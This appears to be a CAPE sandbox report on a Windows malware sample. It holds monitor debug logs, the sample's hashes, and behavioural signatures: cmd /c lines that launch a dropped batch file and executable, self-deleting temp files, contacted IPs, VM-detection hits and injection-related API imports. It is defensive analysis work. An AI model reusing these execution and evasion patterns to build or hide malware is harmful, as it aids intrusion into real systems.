2020-03-24 09:45:23,447 [root] DEBUG: DLL loaded at 0x000007FEFA030000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2020-03-24 09:45:23,821 [root] DEBUG: DLL loaded at 0x000007FEFAE20000: C:\Windows\System32\fwpuclnt (0x53000 bytes).
2020-03-24 09:45:26,036 [root] DEBUG: DLL loaded at 0x000007FEFC680000: C:\Windows\system32\schannel (0x57000 bytes).
2020-03-24 09:45:26,052 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2020-03-24 09:45:26,052 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2020-03-24 09:45:27,736 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2020-03-24 09:45:27,736 [root] DEBUG: DLL loaded at 0x000007FEFCA70000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2020-03-24 09:45:27,736 [root] DEBUG: DLL loaded at 0x000007FEFCA40000: C:\Windows\system32\bcrypt (0x22000 bytes).
2020-03-24 09:45:27,736 [root] DEBUG: DLL loaded at 0x000007FEFC530000: C:\Windows\system32\bcryptprimitives (0x4c000 bytes).
2020-03-24 09:45:27,752 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2020-03-24 09:45:27,767 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2020-03-24 09:45:27,829 [root] DEBUG: DLL loaded at 0x000007FEFC390000: C:\Windows\system32\GPAPI (0x1b000 bytes).
2020-03-24 09:45:27,845 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\cryptbase (0xf000 bytes).
2020-03-24 09:45:27,845 [root] DEBUG: DLL loaded at 0x000007FEF9920000: C:\Windows\system32\cryptnet (0x26000 bytes).
2020-03-24 09:45:27,861 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2020-03-24 09:45:27,877 [root] DEBUG: DLL loaded at 0x000007FEFBA20000: C:\Windows\system32\SensApi (0x9000 bytes).
2020-03-24 09:45:27,924 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:45:27,924 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:45:27,924 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:45:27,954 [root] DEBUG: DLL loaded at 0x000007FEF44E0000: C:\Windows\system32\Cabinet (0x1b000 bytes).
2020-03-24 09:45:27,954 [root] DEBUG: DLL loaded at 0x000007FEFC3D0000: C:\Windows\system32\DEVRTL (0x12000 bytes).
2020-03-24 09:45:27,986 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:28,002 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-03-24 09:45:28,002 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2020-03-24 09:45:28,016 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:45:28,032 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:45:28,032 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:45:28,063 [root] DEBUG: DLL loaded at 0x000007FEFAD90000: C:\Windows\system32\dhcpcsvc6 (0x11000 bytes).
2020-03-24 09:45:28,079 [root] DEBUG: DLL loaded at 0x000007FEFAD70000: C:\Windows\system32\dhcpcsvc (0x18000 bytes).
2020-03-24 09:45:28,095 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:28,111 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:45:28,111 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:28,111 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:28,127 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:30,122 [root] DEBUG: DLL unloaded from 0x000007FEF9920000.
2020-03-24 09:45:30,154 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:45:30,154 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:45:30,170 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:32,322 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:32,322 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:32,338 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:32,338 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:33,710 [root] DEBUG: DLL unloaded from 0x000007FEF9920000.
2020-03-24 09:45:33,726 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:45:33,726 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:45:33,757 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:33,757 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:33,773 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:33,773 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:33,773 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:34,226 [root] DEBUG: DLL unloaded from 0x000007FEF9920000.
2020-03-24 09:45:34,242 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:45:34,242 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:45:34,273 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:35,131 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1632
2020-03-24 09:45:35,131 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:45:35,131 [lib.api.process] INFO: 64-bit DLL to inject is C:\sdijqg\dll\YohPbkoy.dll, loader C:\sdijqg\bin\UtRRdOuA.exe
2020-03-24 09:45:35,131 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:45:35,131 [root] DEBUG: Loader: Injecting process 1632 (thread 2140) with C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:35,131 [root] DEBUG: Process image base: 0x00000000FF900000
2020-03-24 09:45:35,131 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-03-24 09:45:35,131 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-03-24 09:45:35,147 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:45:35,147 [root] DEBUG: Process dumps enabled.
2020-03-24 09:45:35,147 [root] INFO: Disabling sleep skipping.
2020-03-24 09:45:35,161 [root] WARNING: Unable to place hook on LockResource
2020-03-24 09:45:35,161 [root] WARNING: Unable to hook LockResource
2020-03-24 09:45:35,193 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1632 at 0x0000000074460000, image base 0x00000000FF900000, stack from 0x0000000003AB2000-0x0000000003AC0000
2020-03-24 09:45:35,193 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2020-03-24 09:45:35,193 [root] INFO: Added new process to list with pid: 1632
2020-03-24 09:45:35,193 [root] INFO: Monitor successfully loaded in process with pid 1632.
2020-03-24 09:45:35,193 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-03-24 09:45:35,193 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-03-24 09:45:35,209 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:35,381 [root] DEBUG: set_caller_info: Adding region at 0x0000000001FF0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:45:35,381 [root] DEBUG: set_caller_info: Adding region at 0x0000000003A40000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:35,395 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2092
2020-03-24 09:45:35,395 [root] DEBUG: set_caller_info: Adding region at 0x000000000C610000 to caller regions list (ntdll::NtClose).
2020-03-24 09:45:35,395 [root] DEBUG: GetHookCallerBase: thread 2068 (handle 0x0), return address 0x00000000FFA11D42, allocation base 0x00000000FFA10000.
2020-03-24 09:45:35,411 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FFA10000.
2020-03-24 09:45:35,411 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:45:35,411 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FFA10000.
2020-03-24 09:45:35,411 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000246C.
2020-03-24 09:45:35,427 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\2092_13621061567261824232020
2020-03-24 09:45:35,427 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6600.
2020-03-24 09:45:35,427 [root] DEBUG: DLL unloaded from 0x000007FEFC530000.
2020-03-24 09:45:35,443 [root] DEBUG: DLL unloaded from 0x000007FEFCCF0000.
2020-03-24 09:45:35,443 [root] DEBUG: DLL unloaded from 0x000007FEFC680000.
2020-03-24 09:45:35,443 [root] DEBUG: DLL unloaded from 0x000007FEFC500000.
2020-03-24 09:45:35,443 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2020-03-24 09:45:35,459 [root] INFO: Notified of termination of process with pid 2092.
2020-03-24 09:45:35,568 [root] DEBUG: DLL loaded at 0x000007FEF4950000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2020-03-24 09:45:35,582 [root] DEBUG: DLL loaded at 0x000007FEF4500000: C:\Windows\system32\webio (0x64000 bytes).
2020-03-24 09:45:35,582 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4500000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:35,582 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4950000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:35,582 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:35,582 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2020-03-24 09:45:35,582 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFEE90000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:35,582 [root] DEBUG: set_caller_info: Adding region at 0x0000000002760000 to caller regions list (winhttp::WinHttpConnect).
2020-03-24 09:45:35,598 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC890000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:35,598 [root] DEBUG: DLL loaded at 0x000007FEFC290000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2020-03-24 09:45:35,598 [root] DEBUG: DLL loaded at 0x000007FEFC880000: C:\Windows\System32\wship6 (0x7000 bytes).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x0000000003E10000 to caller regions list (winhttp::WinHttpOpenRequest).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x0000000007C70000 to caller regions list (winhttp::WinHttpSetOption).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x0000000007C70000 to caller regions list (winhttp::WinHttpSendRequest).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC710000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC710000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:35,615 [root] DEBUG: DLL loaded at 0x000007FEFA030000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA030000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:35,630 [root] DEBUG: DLL loaded at 0x000007FEFAE20000: C:\Windows\System32\fwpuclnt (0x53000 bytes).
2020-03-24 09:45:35,630 [root] DEBUG: DLL unloaded from 0x000007FEFAF10000.
2020-03-24 09:45:35,630 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAE20000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:38,016 [root] DEBUG: DLL loaded at 0x000007FEFC680000: C:\Windows\system32\schannel (0x57000 bytes).
2020-03-24 09:45:38,016 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC680000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,638 [root] DEBUG: DLL loaded at 0x000007FEFCA70000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2020-03-24 09:45:39,654 [root] DEBUG: DLL loaded at 0x000007FEFCA40000: C:\Windows\system32\bcrypt (0x22000 bytes).
2020-03-24 09:45:39,654 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCA70000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,654 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCA40000 to caller regions list (ntdll::NtDeviceIoControlFile).
2020-03-24 09:45:39,671 [root] DEBUG: DLL loaded at 0x000007FEFC530000: C:\Windows\system32\bcryptprimitives (0x4c000 bytes).
2020-03-24 09:45:39,717 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC390000 to caller regions list (advapi32::RegOpenKeyExW).
2020-03-24 09:45:39,733 [root] DEBUG: DLL loaded at 0x000007FEF9920000: C:\Windows\system32\cryptnet (0x26000 bytes).
2020-03-24 09:45:39,749 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9920000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,749 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFBA20000 to caller regions list (ntdll::NtOpenSection).
2020-03-24 09:45:39,763 [root] DEBUG: DLL loaded at 0x000007FEF44E0000: C:\Windows\system32\Cabinet (0x1b000 bytes).
2020-03-24 09:45:39,763 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF44E0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,842 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:39,904 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAD90000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,904 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAF10000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,920 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:39,920 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFE2F0000 to caller regions list (ntdll::NtCreateEvent).
2020-03-24 09:45:39,920 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:39,936 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:39,936 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:41,292 [root] DEBUG: DLL unloaded from 0x000007FEF9920000.
2020-03-24 09:45:41,323 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:41,417 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:41,417 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:41,433 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:41,448 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:41,730 [root] DEBUG: DLL unloaded from 0x000007FEF9920000.
2020-03-24 09:45:41,760 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:42,618 [root] DEBUG: set_caller_info: Adding region at 0x0000000006DC0000 to caller regions list (ntdll::NtClose).
2020-03-24 09:45:42,618 [root] DEBUG: set_caller_info: Adding region at 0x0000000000060000 to caller regions list (user32::SetWindowLongPtrA).
2020-03-24 09:46:25,831 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2020-03-24 09:46:25,831 [root] INFO: Created shutdown mutex.
2020-03-24 09:46:26,174 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2020-03-24 09:46:26,845 [lib.api.process] INFO: Terminate event set for process 1632
2020-03-24 09:46:26,845 [root] DEBUG: Terminate Event: Attempting to dump process 1632
2020-03-24 09:46:26,845 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FF900000.
2020-03-24 09:46:26,845 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:46:26,845 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF900000.
2020-03-24 09:46:26,845 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000002B790.
2020-03-24 09:46:26,907 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\1632_15268501682646924232020
2020-03-24 09:46:26,907 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x2baa00.
2020-03-24 09:46:26,907 [lib.api.process] INFO: Termination confirmed for process 1632
2020-03-24 09:46:26,907 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 1632
2020-03-24 09:46:26,907 [root] INFO: Terminate event set for process 1632.
2020-03-24 09:46:26,907 [root] INFO: Terminating process 1632 before shutdown.
2020-03-24 09:46:26,907 [root] INFO: Waiting for process 1632 to exit.
2020-03-24 09:46:27,924 [root] INFO: Shutting down package.
2020-03-24 09:46:27,924 [root] INFO: Stopping auxiliary modules.
2020-03-24 09:46:27,924 [root] INFO: Finishing auxiliary modules.
2020-03-24 09:46:27,924 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-03-24 09:46:27,924 [root] WARNING: File at path "C:\RMoLMdOT\debugger" does not exist, skip.
2020-03-24 09:46:27,924 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name target-01
Label target-01
Manager ESX
Started On 2020-03-24 09:43:03
Shutdown On 2020-03-24 09:46:42

File Details

File Name ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
File Size 322048 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0116e1cc3ef60e3cb910654c95e1d1c6
SHA1 a9126493e87f3f761efe8ae9aed4cc4e58ed819e
SHA256 ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
SHA512 40f2880784f086494f19109aa0ca196fe4d0b5764ee17da8d2227582693ea9097b9e977faa1e62288b6bc0f56f813672150915b018b14a21b7014df3a9aaee6a
CRC32 588CA946
Ssdeep 6144:BoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:KTH8ru5kEu9tx/kWtvfFYCE
TrID
  • 38.4% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 26.3% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 11.8% (.EXE) OS/2 Executable (generic) (2029/13)
  • 11.6% (.EXE) Generic Win/DOS Executable (2002/3)
  • 11.6% (.EXE) DOS Executable Generic (2000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Executed a command line with the /C or /R argument, which terminates the command shell on completion and can be used to hide execution
command: cmd /c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 920 triggered the Yara rule 'vmdetect'
Hit: PID 948 triggered the Yara rule 'vmdetect'
Hit: PID 0 triggered the Yara rule 'embedded_win_api'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: ErfkBwzLz2p.exe, PID 920
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
DeletedFile: C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9694.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9713.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar9714.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabAD55.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarAD56.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarCB40.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
Attempts to connect to a dead IP:Port (5 unique times)
IP: 192.229.232.240:80 (United States)
IP: 185.85.0.29:443 (Germany)
IP: 192.42.116.41:80 (Netherlands)
IP: 185.85.0.29:80 (Germany)
IP: 23.202.161.73:80 (United States)
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetClassLongW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/GetMessageW
DynamicLoader: USER32.dll/keybd_event
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
